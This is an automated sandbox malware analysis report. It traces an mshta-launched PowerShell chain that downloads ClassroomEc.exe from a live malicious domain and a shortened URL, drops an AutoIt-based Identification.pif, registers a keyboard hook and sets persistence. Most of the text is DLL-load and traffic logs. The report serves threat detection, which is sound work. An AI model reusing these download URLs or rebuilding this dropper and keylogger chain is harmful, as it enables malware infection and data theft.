Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://whitemansearch.shop
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://whitemansearch.shop/ClassroomEc.exe
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000004.00000002.2120973293.00000000079E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2120550073.000000000799B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/2ZrVm4
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/2ZrVm4;Set-ItemProperty
Source: powershell.exe, 00000004.00000002.2120550073.000000000799B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2no.co/2ZrVm4hn
Source: powershell.exe, 00000002.00000002.2166561428.0000000005091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2106290397.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2106290397.00000000050B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2166561428.00000000058B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2189639078.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2114476212.0000000005FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A78CD0 SetWindowsHookExW 00000002,Function_00008B60,00000000,00000000

8_2_00A78CD0

Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_be942963-8

Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_5815d150-a

Source: Yara match	File source: 19.3.Identification.pif.8b10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.Identification.pif.8b10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.Identification.pif.88f0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2953940198.00000000088F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Identification.pif PID: 8140, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_4408.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4820, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4408, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_BITS_5248_335274008

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D5FAE8	4_2_04D5FAE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D5FAD8	4_2_04D5FAD8
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A98031	8_2_00A98031
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A9810B	8_2_00A9810B
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A983A3	8_2_00A983A3
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A927F0	8_2_00A927F0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3

Source: Producing.8.dr

Static PE information: No import functions for PE file found

Source: Producing.8.dr

Static PE information: Data appended to the last section found

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
